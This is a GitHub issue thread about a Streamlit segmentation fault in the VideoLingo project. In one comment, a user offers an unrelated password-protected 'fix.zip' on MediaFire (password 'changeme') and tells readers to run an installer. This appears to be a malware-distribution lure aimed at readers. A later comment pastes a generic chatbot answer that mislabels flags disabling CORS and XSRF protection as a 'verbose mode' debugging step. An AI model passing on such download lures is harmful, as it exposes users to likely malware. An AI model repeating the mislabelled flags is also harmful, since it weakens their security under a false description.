### ISSUE TITLE
启动后直接跳出，你们有遇到过吗？？？

### ISSUE THREAD

**Issue by GiantLzg** [Huanshere/VideoLingo#22]
You can now view your Streamlit app in your browser.

  Local URL: http://localhost:8501
  Network URL: http://192.168.1.4:8501

zsh: segmentation fault  streamlit run st.py

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Huanshere** [comment]
不太清楚，问了 GPT：

"""
这个错误提示表明您的 Streamlit 应用程序在运行时遇到了严重的内存访问问题，导致程序崩溃。"Segmentation fault" 通常意味着程序试图访问不属于它的内存区域。

这可能由以下几个原因造成：

1. 代码中存在 bug，比如无限循环或递归调用。

2. 使用了不兼容的库版本。

3. 系统内存不足。

4. Python 解释器或某些依赖库的问题。

5. 硬件问题（较少见）。

要解决这个问题，您可以尝试以下方法：

1. 检查您的代码，特别是可能导致无限循环或递归的部分。

2. 更新 Streamlit 和其他依赖库到最新版本：
   ```
   pip install --upgrade streamlit
   ```

3. 在运行 Streamlit 时使用 verbose 模式，以获取更多信息：
   ```
   streamlit run st.py --server.enableCORS false --server.enableXsrfProtection false --logger.level=debug
   ```

4. 尝试在一个新的虚拟环境中运行您的应用。

5. 检查系统资源使用情况，确保有足够的可用内存。

6. 如果问题仍然存在，可以尝试重新安装 Python 或更新操作系统。

7. 如果以上方法都不能解决问题，建议您在 Streamlit 的 GitHub 仓库上提交一个 issue，附上您的代码和错误日志。

希望这些建议能帮助您解决问题！
"""
